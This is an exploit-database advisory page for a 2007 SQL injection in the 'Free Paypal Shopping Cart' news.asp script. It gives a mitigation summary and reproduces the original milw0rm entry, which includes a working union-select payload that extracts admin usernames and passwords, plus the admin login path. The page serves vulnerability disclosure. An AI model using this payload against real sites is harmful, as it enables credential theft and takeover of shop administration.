Free Paypal Shopping Cart Arbitrary SQL Injection

vendor:

by:

kerem125 & gsy

7.5

CVSS

HIGH

SQL Injection

CWE

Product Name:

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested:

2007

Free Paypal Shopping Cart Arbitrary SQL Injection

The vulnerability allows an attacker to execute arbitrary SQL queries in the 'news_id' parameter of the 'news.asp' script. By injecting a union select statement, the attacker can retrieve sensitive information such as the admin username and password.

Mitigation:

The vulnerability can be mitigated by implementing proper input validation and parameterized queries to prevent SQL injection attacks.

Source

Exploit-DB raw data:

########################################################################################
#Discovered by: kerem125 & gsy
#Website: http://www.kerem125.com/ & http://www.by-gsy.org/
#Script download:
http://download.asprehberi.net/dosyalar/kategoriler/alisveris/freepaypalshoppingcart_tr.zip
#Exploit:
/news.asp?news_id=16union+select+all+0,1,admin_name,Password,4+from+admin
#Example :
http://www.localhost/shop/news.asp?news_id=1 20union+select+all+0,1,admin_name,Password,4+from+admin
#Admin Login : /admin/login.asp
Contact : kerem125@kerem125.com & by_gsy@hotmail.com
#Special Thanks to : by_emR3 - Bolivar - VolTiGoRe - CyberGhost - KinSize
-xYz - F-10 - DarXBoyZ - GencDefacer And Str0ke for posting Milw0rm
########################################################################################

# milw0rm.com [2007-06-06]